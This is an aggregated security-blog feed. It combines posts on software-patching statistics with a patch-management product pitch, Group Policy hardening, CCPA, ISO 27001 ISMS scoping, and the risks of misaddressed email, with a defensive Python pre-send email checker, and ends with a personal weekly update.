  • Upon a breach or failed audit, nearly half of companies (46%) took longer than 10 days to remedy the situation and apply patches, because deploying updates in the entire organization can be difficult – Voke Media survey, 2016.
  • Devastating malware and ransomware which could have been prevented by patching software on time: WannaCry, NotPetya, SamSam.
  • 20% of all vulnerabilities caused by unpatched software are classified as High Risk or Critical – Edgescan Stats Report, 2018.
  • The average time for organizations to close a discovered vulnerability (caused by unpatched software and apps) is 67 days – Edgescan Stats Report, 2018.
  • 18% of all network-level vulnerabilities are caused by unpatched applications – Apache, Cisco, Microsoft, WordPress, BSD, PHP, etc. – Edgescan Stats Report, 2018.
  • 37% of organizations admitted that they don’t even scan for vulnerabilities – Ponemon Report, 2018.
  • 58% of organizations run on ‘legacy systems’ – platforms which are no longer supported with patches but which would still be too expensive to replace in the near future – 0patch Survey Report, 2017.
  • 64% of organizations say that they plan to hire more people on the vulnerability response team, although the average headcount is already 28, representing about 29% of all security human resources – Ponemon State of Vulnerability Report, 2018.
  • Still, this is something known in the industry as the ‘patching paradox’ – hiring more people will not make software vulnerabilities easier to handle – Ponemon State of Vulnerability Report, 2018.
  • Microsoft reports that most of its customers are breached via vulnerabilities that had patches released years ago – Microsoft’s Security Intelligence Report, 2015.
  • Since 2002, the total number of software vulnerabilities has grown year by year by the thousands. The peak year seems to have been 2018 for now, but the figures keep rising – ENISA report for 2018.

Why Is Software Patching So Difficult?

The main reason why patching is difficult is that manual updates (or coordinating the updates manually) take a gruesome amount of time.

According to the Ponemon Institute study for 2018:

  • More than half of all companies (55%) say they spend more time manually navigating the various processes involved than actually patching vulnerabilities;
  • On average it takes 12 days for teams to coordinate for applying a patch across all devices;
  • Most companies (61%) feel that they are at a disadvantage for relying on manual processes to apply software patches;
  • Nearly two-thirds of all companies (65%) say that it is currently too difficult for them to decide correctly on the priority level of each software patch (aka which update is of critical importance and should be applied first).

Considering that most organizations cannot justify keeping highly trained security experts on their payroll, difficulties in prioritizing patches are to be expected. In the best case, security and IT professionals define priorities simply by following the CVSS scoring.

While CVSS scoring is a reliable guide to patch importance, organizations that automate software patching are still better off, both in terms of security and in time spent.

Why Do Companies Choose to Delay Applying Software Patches and Updates?

It’s not just that it’s difficult. Some managers don’t want to apply the patches.

Organizations are not just late in applying patches because it takes time; some managers are reluctant to apply the patches for other reasons. According to the 0patch Survey Report, 2017:

  • 88% say they would apply patches faster if they had the option to quickly un-patch if needed;
  • 79% say decoupling security patches from functional ones would help them apply security patches faster;
  • 72% of managers are afraid to apply security patches right away because they could ‘break stuff’;
  • 52% of managers say they don’t want the functionality changes which come with security patching.

Even more worrying is that not everyone is aware of how dangerous it can be to delay. One of the most baffling software patching statistics of the past year comes from the Ponemon Institute report for 2019, again. According to them, only 39% of organizations are aware that actual breaches are linked to known vulnerabilities.

Of course, not wanting the hassle of updating software or system is a legitimate attitude, albeit a very dangerous one. But it’s only a hassle if you plan on updating it alone, manually.

Our Own Software Patching Statistics:

We have hundreds of thousands of enterprise endpoints which are kept secure and up to date through our patch management automation solution, X-Ploit Resilience. While our fast response and implementation times allow us to keep them all updated at a much higher rate compared to industry benchmarks, there are still interesting insights to be gleaned from our data.

This is what we can boast:

  • A new patch reaches the endpoints secured with our patch management system within 4 hours since it was launched (if the endpoint is available to receive it);
  • By automatically applying the patches, the X-Ploit Resilience technology effectively closes all possible system vulnerabilities in an enterprise environment, effectively taking away about 85% of all possible attack vectors;
  • At the moment, the X-Ploit Resilience patch management system covers 112 of the most common software and apps, with several apps and software being added to the list every year.

And this is what we and our customers need to work on together for an even better performance:

  • During the last 3 months, our corporate customers took a while to apply the patches we made available through our system (either because the endpoints were inactive or because of a conscious decision to delay), but still at a rate 4 times faster than the global average.

Wrapping up:

If there’s one thing that the latest software patching statistics reflect, it’s that the field is very non-homogeneous. Some organizations react faster to patches but take a long time applying them, or apply them in the wrong order. Others have complicated assignment procedures, but once a patch is set to be applied, it goes fast and smooth. Some apply only critical system updates and completely reject other patches to avoid functionality changes, even if it puts them at some risk.

The bottom line is that whatever is your organization’s unique flavor, we know patches can be overwhelming in one way or another. That’s why we leverage the scaling power of technology to help keep our customers covered with all software patches and zero inconveniences.

Our X-Ploit Resilience module will handle all software updates and patches within 4 hours since their launch, silently, in the background, with no interruptions. You can set it and forget it, as we like to say, or set a few preferences (like the right to exclude updates from one app or category, or to be asked before applying a patch on all endpoints within your organization, or the possibility to deploy and patch your own custom software through the platform).

The post Software Patching Statistics for 2019: Common Practices and Vulnerabilities appeared first on Heimdal Security Blog.

Webcast: Group Policies That Kill Kill Chains

On this webcast, we’ll guide you through an iterative process of building and deploying effective and practical Group Policy Objects (GPOs) that increase security posture. Download slides: 0:45 Introducing what a kill chain is and general background you need for this webcast 15:53 Getting into group policies, best practices, group policies that we’re not covering […]

The post Webcast: Group Policies That Kill Kill Chains appeared first on Black Hills Information Security.

IDG Contributor Network: What is the California Consumer Privacy Act of 2018? Influencers in the know break down the details

It was only a matter of time before the US created its own version of the EU’s General Data Protection Regulation (GDPR). However, unlike the EU, which addresses digital privacy protection at the supranational level, the US is handling online privacy at the state level. California has led the charge with the California Consumer Privacy Act (CCPA), which was passed into law in 2018.

3 main takeaways from the California Consumer Privacy Act of 2018

CCPA is designed with consumers in mind and gives California residents some of the strongest online privacy protections in the country. Here are three main takeaways of the California Consumer Privacy Act of 2018:


How to document the scope of your ISMS

If you’re planning to implement an ISMS (information security management system), you’ll need to document the scope of your project – or, in other words, define what information needs to be protected.

There will almost certainly be more information and more locations where information is kept than you initially think of, so it’s essential that you take the time to scope your organisation. However, this involves more than simply identifying the data stored on your systems.

Benefits of defining the scope of your ISMS

Organisations that define the scope of their ISMS will have a much better understanding of their information security environment – where their data resides, where their data is safe, what format the data is held in, and so on.

Knowing this helps you complete information security audits, particularly when it comes to understanding how to approach specific risks and which controls are most suitable.

Similarly, by defining the scope of their ISMS, organisations also define what’s out of scope. Having a firm grasp of what doesn’t need to be addressed provides assurances that key parts of the business aren’t being overlooked.

For example, you might identify a third-party data processor that collects information on your behalf – like a payroll service.

You will probably have a contractual agreement with the third party outlining mandatory information security controls, but you have no control over how these are operated, so you can’t consider it within your scope.

You should instead document the organisation and its processing under Annex A control A.15 – supplier relationships.

Defining your scope

There are three steps to defining the scope of your ISMS. First, you need to identify every location where information is stored.

This includes physical and digital files, the latter of which might be kept locally or in the Cloud.

Second, you need to identify the ways in which information can be accessed. Any entry point, be it a drawer full of files or an employee’s work-issued laptop, should be noted.

Third, you need to determine what is out of scope. These are elements that your organisation either has no control over (such as third-party products) or that don’t give access to or house sensitive information.

For example, your organisation’s foyer probably won’t need security controls. If for some reason you do keep sensitive information there, it would be worth relocating it to put the foyer out of scope.

A well-defined scope ensures that every area of your organisation receives adequate attention when it comes to implementing security controls.

Documenting your scope is also a requirement of ISO 27001, the international standard that describes best practices for an ISMS.

What should the ISO 27001 scoping document look like?

Organisations often get tripped up by how to document the scope of their ISMS, either guessing or spending an inordinate amount of time researching how much detail to go into and the best way to lay out the information.

However, you can avoid that hassle by using our ISO 27001 ISMS Documentation Toolkit.

Developed by expert ISO 27001 practitioners and enhanced by more than ten years of customer feedback and continual improvement, it contains a customisable scope statement as well as templates for every document you need to implement an effective ISMS and comply with the Standard.

[Figure: Our customisable scope statement takes the hassle out of documenting ISO 27001 compliance.]

The toolkit contains:

  • A complete set of easy-to-use, customisable and fully ISO 27001-compliant documentation templates that will save you time and money;
  • Easy-to-use dashboards and gap analysis tools to ensure complete coverage of the Standard; and
  • Direction and guidance from expert ISO 27001 practitioners.


A version of this blog was originally published on 24 May 2018.

The post How to document the scope of your ISMS appeared first on IT Governance UK Blog.

Three Consequences of a Misaddressed Email

Article by Andrea Babbs, UK General Manager, VIPRE SafeSend

With the number and sophistication of cyber attacks increasing significantly, organisations have had to become aware and adapt to new and evolving digital threats. Yet, many would still consider the simple error of sending an email to the wrong contact trivial, at most embarrassing, but not of concern when it comes to data security. However, misaddressed emails have far-reaching consequences that can seriously impact an organisation, especially in highly regulated industries such as healthcare and finance. From fines to data breaches, what are the potential ramifications of sending an email to the wrong address?

Reputational and Financial Damage

While accidentally dialling a wrong number can be a little embarrassing, the same cannot be said for sending an email to the wrong contact. You could try to correct the error with a follow-up email to apologise and request that the recipient delete the message, but even if you’ve spotted the error it’s often too late. Moreover, the misuse of CC and BCC functions could expose your entire contact database, potentially giving your competitors an opportunity to lure your customers or employees away, or worse – exposing customer emails to potential hackers.

BitMEX, one of the world’s largest cryptocurrency trading platforms, accidentally leaked thousands of private customer email addresses when it sent out a mass mailshot without using the BCC function. While the company maintains that customer privacy remains a top priority, its customers were left wondering how they could trust BitMEX with huge personal assets in the aftermath of this data protection failure.

A similar incident in 2018 led to the Independent Inquiry into Child Sexual Abuse (IICSA) being fined £200,000 by the Information Commissioner’s Office (ICO) for failing to protect the identity of possible victims of child abuse: a human error exposed victim identities to third parties when their email addresses were placed in the ‘To’ rather than the ‘BCC’ field. In the age of increased data protection regulation, this example demonstrates just how seriously the ICO takes these types of data breaches. The embarrassment of sending an email to the wrong contact pales in comparison to the business pain of financial penalties.

Intellectual Property Loss

Should confidential corporate information fall into the wrong hands, the consequences could be devastating. Crucial company information such as trade secrets or blueprints of an unpatented new product leaking into the public domain could easily be intercepted by the competition, resulting in a lost competitive advantage.

All it takes is a simple missed or added character in the email address, autocorrect taking over, or simply pressing send too soon and the information that was once confidential is sitting in the wrong inbox. It could be that of an unknown individual, competitor, or even a cyber-criminal.

In 2018, Commonwealth Bank staff inadvertently sent 651 emails to an overseas company as they forgot to include ‘.au’ at the end of the domain that should have read ‘’. This data leak occurred over a long period without anyone noticing, so could have potentially exposed sensitive company data or private customer information to competitors, putting the company at serious risk. However, luckily on this occasion, the company confirmed that no customer data had been compromised.

Data Breach

The ICO found that misaddressed emails are the largest source of data loss for organisations – over 269 billion emails are sent around the world each day. Gone are the days when employees operated from a single office-based computer; the modern workforce now works from potentially several locations across a number of devices. Combine this with the increasing pressure on staff juggling deadlines and deliverables to perform better and faster, and it’s no surprise that most don’t spend time verifying the accuracy of the email address they are about to send confidential information to – no organisation is immune to human error.

Hackers can capitalise on this complacent email culture by cleverly disguising emails to look like they are coming from inside the company when they actually come from a similar, spoofed domain name that the employee would probably fail to spot at first glance. This potentially opens the organisation up to a devastating hacking, malware or ransomware attack, and is a clear reason why Business Email Compromise (BEC) scams continue to be popular with cybercriminals.

The ramifications of misaddressed emails go far beyond just an embarrassing mishap – the threat that comes from accidental data leakage can be just as damaging as the external threat of cybercrime, especially as these leaks often go unnoticed for a period of time. Businesses need a clear strategy to address the issue of misaddressed emails and mitigate the associated risks to remain compliant and secure. What is required is a tool that prompts users for a double-check of their email based on set parameters, who it is being sent to, the contents and attachments. But this isn’t about adding time or delay to employees that are already under pressure – it’s about increasing awareness and improving email culture where mistakes can so easily be made.
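One way to implement the pre-send double-check described above, covering the three mistakes the article walks through (a dropped domain suffix, a look-alike domain, and To/CC used where BCC belongs). This is an added example, not code from the article or from VIPRE's product; the trusted domain names, the recipient threshold and the sample addresses are constructed assumptions.

```python
"""Outbound email double-check: returns the prompts a sender should confirm before pressing send."""
from email.utils import parseaddr

# Constructed policy: domains the organisation owns or regularly corresponds with (hypothetical).
TRUSTED_DOMAINS = {"example-bank.com.au", "auditors.example.org"}
MAX_VISIBLE_RECIPIENTS = 10   # more visible addresses than this is a mass mail that belongs in BCC
NEAR_MISS_DISTANCE = 2        # edit distance at which a domain counts as a typo/look-alike


def _domain(addr):
    """Extract the lower-cased domain from 'Name <user@host>' or 'user@host'."""
    return parseaddr(addr)[1].rsplit("@", 1)[-1].lower()


def _edit_distance(a, b):
    """Levenshtein distance, used to spot one- or two-character look-alike domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _near_miss(domain, trusted):
    """True if domain is a truncation (e.g. '.au' dropped) or a close misspelling of a trusted domain."""
    if domain in trusted:
        return False
    return any(t.startswith(domain + ".") or _edit_distance(domain, t) <= NEAR_MISS_DISTANCE
               for t in trusted)


def check_outbound(to, cc=(), attachments=(), trusted=TRUSTED_DOMAINS):
    """Return the list of warnings for a draft; an empty list means nothing to confirm."""
    warnings = []
    visible = list(to) + list(cc)
    if len(visible) > MAX_VISIBLE_RECIPIENTS:
        warnings.append(f"{len(visible)} addresses visible in To/CC: use BCC for mass mail")
    external = [a for a in visible if _domain(a) not in trusted]
    for addr in external:
        if _near_miss(_domain(addr), trusted):
            warnings.append(f"{addr}: domain looks like a misspelling or truncation of a trusted domain")
    if attachments and external:
        warnings.append(f"attachments {sorted(attachments)} go to {len(external)} external recipient(s)")
    return warnings


if __name__ == "__main__":
    # Constructed draft: '.au' dropped from the bank's domain, with a spreadsheet attached.
    for w in check_outbound(["Bob <bob@example-bank.com>"], attachments=["q3-forecast.xlsx"]):
        print("CONFIRM:", w)
```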

Weekly Update 167

It's summer! Yes, I know it's back to front for many of you but Dec 1 means it's sunnier than ever here. Regardless, this week I've been at DDD in Brisbane, written about my 10-year-old son Ari and me running kids' coding clubs in Oslo (cold) and London (rainy) next month, and the Swiss gov being on-boarded onto HIBP. Plus there's this week's sponsor IVPN and how tracking ain't tracking (that may be a bit of an old Aussieism). Next week I'll come to you from the YOW! conference somewhere else within the country.


  1. I'll be keynoting at YOW! Sydney, Brisbane and Melbourne over the coming couple of weeks (happy to be back there after a few years hiatus)
  2. Come and join Ari and I teaching kids to code in Oslo and London next month (it's free, just bring a kid and a laptop)
  3. The Swiss gov is now on HIBP! (that makes 7, I'd love intros to more govs)
  4. Sponsored by IVPN. This ad is not tracking you, but most others do. Fight digital surveillance by blocking ads and web trackers on all your devices. (and no, they're not "tracking you" when you click that link!)